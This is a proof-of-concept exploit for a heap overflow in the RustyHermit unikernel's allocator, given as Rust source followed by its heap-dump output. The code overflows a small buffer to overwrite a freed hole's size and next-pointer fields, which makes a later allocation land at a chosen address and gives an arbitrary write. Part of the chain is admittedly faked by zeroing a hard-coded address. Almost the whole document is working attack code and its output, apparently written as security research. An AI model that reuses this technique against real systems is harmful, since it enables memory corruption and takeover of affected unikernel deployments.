RustyHermit Heap Overflow to Arbitrary Write Proof of Concept
--- Welcome aboard our Airbus A 1337! ---
[info] Main @ 0x1906700
heap layout after allocating all buffers
0x1c04200: 0x101010101010101
0x1c04208: 0x101010101010101
0x1c04210: 0x101010101010101
0x1c04218: 0x101010101010101
0x1c04220: 0x0
0x1c04228: 0x0
0x1c04230: 0x0
0x1c04238: 0x0
0x1c04240: 0x0
0x1c04248: 0x0
0x1c04250: 0x0
0x1c04258: 0x0
0x1c04260: 0x0
0x1c04268: 0x0
0x1c04270: 0x0
0x1c04278: 0x0
0x1c04280: 0x202020202020202
0x1c04288: 0x202020202020202
0x1c04290: 0x202020202020202
0x1c04298: 0x202020202020202
0x1c042a0: 0x202020202020202
0x1c042a8: 0x202020202020202
0x1c042b0: 0x202020202020202
0x1c042b8: 0x202020202020202
0x1c042c0: 0x0
0x1c042c8: 0x0
0x1c042d0: 0x0
0x1c042d8: 0x0
0x1c042e0: 0x0
0x1c042e8: 0x0
0x1c042f0: 0x0
0x1c042f8: 0x0
0x1c04300: 0x303030303030303
0x1c04308: 0x303030303030303
0x1c04310: 0x303030303030303
0x1c04318: 0x303030303030303
0x1c04320: 0x303030303030303
0x1c04328: 0x303030303030303
0x1c04330: 0x303030303030303
0x1c04338: 0x303030303030303
0x1c04340: 0x303030303030303
0x1c04348: 0x303030303030303
0x1c04350: 0x303030303030303
0x1c04358: 0x303030303030303
0x1c04360: 0x303030303030303
0x1c04368: 0x303030303030303
0x1c04370: 0x303030303030303
0x1c04378: 0x303030303030303
0x1c04380: 0x303030303030303
0x1c04388: 0x303030303030303
0x1c04390: 0x303030303030303
0x1c04398: 0x303030303030303
0x1c043a0: 0x303030303030303
0x1c043a8: 0x303030303030303
0x1c043b0: 0x303030303030303
0x1c043b8: 0x303030303030303
0x1c043c0: 0x303030303030303
0x1c043c8: 0x303030303030303
0x1c043d0: 0x303030303030303
0x1c043d8: 0x303030303030303
0x1c043e0: 0x303030303030303
0x1c043e8: 0x303030303030303
0x1c043f0: 0x303030303030303
0x1c043f8: 0x303030303030303
0x1c04400: 0x1bfbc00
0x1c04408: 0x0
0x1c04410: 0x0
0x1c04418: 0x0
0x1c04420: 0x0
0x1c04428: 0x0
0x1c04430: 0x0
0x1c04438: 0x0
0x1c04440: 0x0
0x1c04448: 0x0
0x1c04450: 0x0
0x1c04458: 0x0
0x1c04460: 0x0
0x1c04468: 0x0
0x1c04470: 0x0
0x1c04478: 0x0
heap layout after deallocating buffer2
0x1c04200: 0x101010101010101
0x1c04208: 0x101010101010101
0x1c04210: 0x101010101010101
0x1c04218: 0x101010101010101
0x1c04220: 0x0
0x1c04228: 0x0
0x1c04230: 0x0
0x1c04238: 0x0
0x1c04240: 0x0
0x1c04248: 0x0
0x1c04250: 0x0
0x1c04258: 0x0
0x1c04260: 0x0
0x1c04268: 0x0
0x1c04270: 0x0
0x1c04278: 0x0
0x1c04280: 0x80
0x1c04288: 0x1c04400
0x1c04290: 0x202020202020202
0x1c04298: 0x202020202020202
0x1c042a0: 0x202020202020202
0x1c042a8: 0x202020202020202
0x1c042b0: 0x202020202020202
0x1c042b8: 0x202020202020202
0x1c042c0: 0x0
0x1c042c8: 0x0
0x1c042d0: 0x0
0x1c042d8: 0x0
0x1c042e0: 0x0
0x1c042e8: 0x0
0x1c042f0: 0x0
0x1c042f8: 0x0
0x1c04300: 0x303030303030303
0x1c04308: 0x303030303030303
0x1c04310: 0x303030303030303
0x1c04318: 0x303030303030303
0x1c04320: 0x303030303030303
0x1c04328: 0x303030303030303
0x1c04330: 0x303030303030303
0x1c04338: 0x303030303030303
0x1c04340: 0x303030303030303
0x1c04348: 0x303030303030303
0x1c04350: 0x303030303030303
0x1c04358: 0x303030303030303
0x1c04360: 0x303030303030303
0x1c04368: 0x303030303030303
0x1c04370: 0x303030303030303
0x1c04378: 0x303030303030303
0x1c04380: 0x303030303030303
0x1c04388: 0x303030303030303
0x1c04390: 0x303030303030303
0x1c04398: 0x303030303030303
0x1c043a0: 0x303030303030303
0x1c043a8: 0x303030303030303
0x1c043b0: 0x303030303030303
0x1c043b8: 0x303030303030303
0x1c043c0: 0x303030303030303
0x1c043c8: 0x303030303030303
0x1c043d0: 0x303030303030303
0x1c043d8: 0x303030303030303
0x1c043e0: 0x303030303030303
0x1c043e8: 0x303030303030303
0x1c043f0: 0x303030303030303
0x1c043f8: 0x303030303030303
0x1c04400: 0x1bfbc00
0x1c04408: 0x0
0x1c04410: 0x0
0x1c04418: 0x0
0x1c04420: 0x0
0x1c04428: 0x0
0x1c04430: 0x0
0x1c04438: 0x0
0x1c04440: 0x0
0x1c04448: 0x0
0x1c04450: 0x0
0x1c04458: 0x0
0x1c04460: 0x0
0x1c04468: 0x0
0x1c04470: 0x0
0x1c04478: 0x0
heap layout after cheating
0x1c04200: 0x4141414141414141
0x1c04208: 0x4141414141414141
0x1c04210: 0x4141414141414141
0x1c04218: 0x4141414141414141
0x1c04220: 0x4141414141414141
0x1c04228: 0x4141414141414141
0x1c04230: 0x4141414141414141
0x1c04238: 0x4141414141414141
0x1c04240: 0x4141414141414141
0x1c04248: 0x4141414141414141
0x1c04250: 0x4141414141414141
0x1c04258: 0x4141414141414141
0x1c04260: 0x4141414141414141
0x1c04268: 0x4141414141414141
0x1c04270: 0x4141414141414141
0x1c04278: 0x4141414141414141
0x1c04280: 0x40
0x1c04288: 0x1c04380
0x1c04290: 0x202020202020202
0x1c04298: 0x202020202020202
0x1c042a0: 0x202020202020202
0x1c042a8: 0x202020202020202
0x1c042b0: 0x202020202020202
0x1c042b8: 0x202020202020202
0x1c042c0: 0x0
0x1c042c8: 0x0
0x1c042d0: 0x0
0x1c042d8: 0x0
0x1c042e0: 0x0
0x1c042e8: 0x0
0x1c042f0: 0x0
0x1c042f8: 0x0
0x1c04300: 0x303030303030303
0x1c04308: 0x303030303030303
0x1c04310: 0x303030303030303
0x1c04318: 0x303030303030303
0x1c04320: 0x303030303030303
0x1c04328: 0x303030303030303
0x1c04330: 0x303030303030303
0x1c04338: 0x303030303030303
0x1c04340: 0x303030303030303
0x1c04348: 0x303030303030303
0x1c04350: 0x303030303030303
0x1c04358: 0x303030303030303
0x1c04360: 0x303030303030303
0x1c04368: 0x303030303030303
0x1c04370: 0x303030303030303
0x1c04378: 0x303030303030303
0x1c04380: 0x303030303030303
0x1c04388: 0x0
0x1c04390: 0x303030303030303
0x1c04398: 0x303030303030303
0x1c043a0: 0x303030303030303
0x1c043a8: 0x303030303030303
0x1c043b0: 0x303030303030303
0x1c043b8: 0x303030303030303
0x1c043c0: 0x303030303030303
0x1c043c8: 0x303030303030303
0x1c043d0: 0x303030303030303
0x1c043d8: 0x303030303030303
0x1c043e0: 0x303030303030303
0x1c043e8: 0x303030303030303
0x1c043f0: 0x303030303030303
0x1c043f8: 0x303030303030303
0x1c04400: 0x1bfbc00
0x1c04408: 0x0
0x1c04410: 0x0
0x1c04418: 0x0
0x1c04420: 0x0
0x1c04428: 0x0
0x1c04430: 0x0
0x1c04438: 0x0
0x1c04440: 0x0
0x1c04448: 0x0
0x1c04450: 0x0
0x1c04458: 0x0
0x1c04460: 0x0
0x1c04468: 0x0
0x1c04470: 0x0
0x1c04478: 0x0
heap layout after exploit
0x1c04200: 0x4141414141414141
0x1c04208: 0x4141414141414141
0x1c04210: 0x4141414141414141
0x1c04218: 0x4141414141414141
0x1c04220: 0x4141414141414141
0x1c04228: 0x4141414141414141
0x1c04230: 0x4141414141414141
0x1c04238: 0x4141414141414141
0x1c04240: 0x4141414141414141
0x1c04248: 0x4141414141414141
0x1c04250: 0x4141414141414141
0x1c04258: 0x4141414141414141
0x1c04260: 0x4141414141414141
0x1c04268: 0x4141414141414141
0x1c04270: 0x4141414141414141
0x1c04278: 0x4141414141414141
0x1c04280: 0x40
0x1c04288: 0x1c04500
0x1c04290: 0x202020202020202
0x1c04298: 0x202020202020202
0x1c042a0: 0x202020202020202
0x1c042a8: 0x202020202020202
0x1c042b0: 0x202020202020202
0x1c042b8: 0x202020202020202
0x1c042c0: 0x0
0x1c042c8: 0x0
0x1c042d0: 0x0
0x1c042d8: 0x0
0x1c042e0: 0x0
0x1c042e8: 0x0
0x1c042f0: 0x0
0x1c042f8: 0x0
0x1c04300: 0x303030303030303
0x1c04308: 0x303030303030303
0x1c04310: 0x303030303030303
0x1c04318: 0x303030303030303
0x1c04320: 0x303030303030303
0x1c04328: 0x303030303030303
0x1c04330: 0x303030303030303
0x1c04338: 0x303030303030303
0x1c04340: 0x303030303030303
0x1c04348: 0x303030303030303
0x1c04350: 0x303030303030303
0x1c04358: 0x303030303030303
0x1c04360: 0x303030303030303
0x1c04368: 0x303030303030303
0x1c04370: 0x303030303030303
0x1c04378: 0x303030303030303
0x1c04380: 0x404040404040404
0x1c04388: 0x404040404040404
0x1c04390: 0x404040404040404
0x1c04398: 0x404040404040404
0x1c043a0: 0x404040404040404
0x1c043a8: 0x404040404040404
0x1c043b0: 0x404040404040404
0x1c043b8: 0x404040404040404
0x1c043c0: 0x404040404040404
0x1c043c8: 0x404040404040404
0x1c043d0: 0x404040404040404
0x1c043d8: 0x404040404040404
0x1c043e0: 0x404040404040404
0x1c043e8: 0x404040404040404
0x1c043f0: 0x404040404040404
0x1c043f8: 0x404040404040404
0x1c04400: 0x404040404040404
0x1c04408: 0x404040404040404
0x1c04410: 0x404040404040404
0x1c04418: 0x404040404040404
0x1c04420: 0x404040404040404
0x1c04428: 0x404040404040404
0x1c04430: 0x404040404040404
0x1c04438: 0x404040404040404
0x1c04440: 0x404040404040404
0x1c04448: 0x404040404040404
0x1c04450: 0x404040404040404
0x1c04458: 0x404040404040404
0x1c04460: 0x404040404040404
0x1c04468: 0x404040404040404
0x1c04470: 0x404040404040404
0x1c04478: 0x404040404040404
[info] written to 0x1c04380!
--- Thank you for flying with Expl01t Airlines! ---
#[cfg(target_os = "hermit")]
extern crate hermit_sys;
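/// Dumps a `0x280`-byte window of memory starting at `base`, one `usize` word
/// per line in the form `<address>: 0x<value>`. The PoC calls it with a
/// buffer's start address to visualise the surrounding heap chunks before and
/// after each step.
///
/// `base` is an arbitrary address: the function walks well past any single
/// allocation (the caller passes the start of a 32-byte buffer), so it is only
/// sound when the whole window `[base, base + 0x280)` is mapped and readable.
/// Words are read with `read_unaligned`, so a `base` that is not 8-byte
/// aligned is tolerated instead of being undefined behaviour.
fn print_heap_layout(base: usize) {
    // Same offsets as the original `i += 8` loop: 0, 8, ..., 0x278.
    for offset in (0..0x280usize).step_by(8) {
        let word_ptr = (base + offset) as *const usize;
        // SAFETY: the caller guarantees the window [base, base + 0x280) is
        // mapped and readable; read_unaligned removes the alignment
        // requirement a plain `*word_ptr` would impose.
        let value = unsafe { word_ptr.read_unaligned() };
        println!("{:p}: 0x{:x}", word_ptr, value);
    }
}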
/// Entry point of the proof of concept.
///
/// Sequence, as performed by the code below:
/// 1. prints a banner and the address of `main`;
/// 2. builds `input`, a 144-byte simulated payload: 128 bytes of `0x41`, an
///    8-byte little-endian size word (`0x40`) and an 8-byte little-endian
///    address (`0x1c04380`);
/// 3. allocates `buf` (32 bytes), `buf2` (64 bytes) and `_buf3` (256 bytes),
///    then frees `buf2` so that a free hole directly follows `buf`;
/// 4. copies all 144 bytes of `input` into the 32-byte `buf` through a raw
///    pointer — the simulated bug — which overwrites the freed hole's header;
/// 5. zeroes the word at the hard-coded address `0x1c04388`;
/// 6. allocates `buf4` (257 bytes) and prints where it landed.
///
/// The heap is dumped with `print_heap_layout` after each step. The absolute
/// addresses used here (`0x1c04380`, `0x1c04388`) are presumably specific to
/// the author's build and heap layout; on a different layout the program is
/// expected to fault rather than demonstrate the write (TODO confirm).
fn main() {
    println!("\n--- Welcome aboard our Airbus A 1337! ---\n");
    println!("[info] Main @ {:p}", main as *const ());
    // Simulated input: the bytes a vulnerable copy routine would receive.
    // 128 bytes fill the legitimate buffer plus padding, the remaining 16 bytes
    // land on the freed chunk's header (see the comments inside the array).
    // NOTE(review): `buf` is only 32 bytes, yet the dumps show its chunk spanning
    // 0x80 bytes before the next header — presumably allocator rounding to a
    // minimum block size; confirm against the allocator before relying on it.
    let input: Vec<u8> = Vec::from([
        // fill legitimate buffer + padding to 128 bytes
        0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
        // overwrite the following hole's size field (little-endian 0x40)
        0x40, 0, 0, 0, 0, 0, 0, 0,
        // overwrite the following hole's next pointer with our arbitrary target
        // address (little-endian 0x1c04380)
        0x80, 0x43, 0xc0, 0x01, 0, 0, 0, 0
    ]);
    // allocate buffers; `buf` is the one that gets overflowed
    let mut buf: Vec<u8> = vec![1; 32];
    let buf2: Vec<u8> = vec![2; 64];
    let _buf3: Vec<u8> = vec![3; 256];
    println!("\n heap layout after allocating all buffers");
    // NOTE: each dump reads 0x280 bytes from `buf`'s start — far past its 32-byte
    // allocation — on purpose, to show the neighbouring chunks.
    print_heap_layout(buf.as_ptr() as usize);
    // free buffer2 so that `buf` is directly followed by a hole
    drop(buf2);
    println!("\n heap layout after deallocating buffer2");
    print_heap_layout(buf.as_ptr() as usize);
    unsafe {
        // Vulnerable copy loop, e.g. a driver copying from shared MMIO.
        // This is the simulated defect: every byte of `input` (144 bytes) is
        // written through a raw pointer into `buf` (32 bytes) with no length
        // check, so the write runs into the adjacent freed hole's header.
        // A bounded copy (checking `input.len() <= buf.len()` first, or a slice
        // copy that panics on a length mismatch) would stop it at 32 bytes.
        // `i` is inferred as `isize` because `offset` takes an `isize`.
        let mut i = 0;
        for elem in input {
            *(buf.as_mut_ptr().offset(i)) = elem;
            i+=1;
        }
        // the allocator runs into a page fault when fake_hole.next_ptr is not
        // readable or not 0 (end of the hole list)
        // also the constraint hole_addr + hole.size <= addr has to be met for
        // the next hole; see src/mm/hole.rs#L244
        // Thus, the constraints for this exploit to work are:
        // 1. the target address needs to hold a value large enough that we get
        //    the hole allocated AND
        // 2. target address + 8 has to be 0 or a valid readable address
        //    matching the above condition
        // cheat: set target address + 8 to 0 for this PoC
        // (hard-coded absolute address 0x1c04380 + 8, written through a raw
        // pointer; only valid for the heap layout shown in the dumps)
        *(0x1c04388 as *mut u64) = 0;
    }
    println!("\n heap layout after cheating");
    print_heap_layout(buf.as_ptr() as usize);
    // allocate a buffer which is now placed at our arbitrary target address and
    // write the payload (257 bytes of 0x04) there
    let buf4: Vec<u8> = vec![4; 257];
    println!("\n heap layout after exploit");
    print_heap_layout(buf.as_ptr() as usize);
    println!("[info] written to {:p}!", buf4.as_ptr());
    println!("\n--- Thank you for flying with Expl01t Airlines! ---\n");
}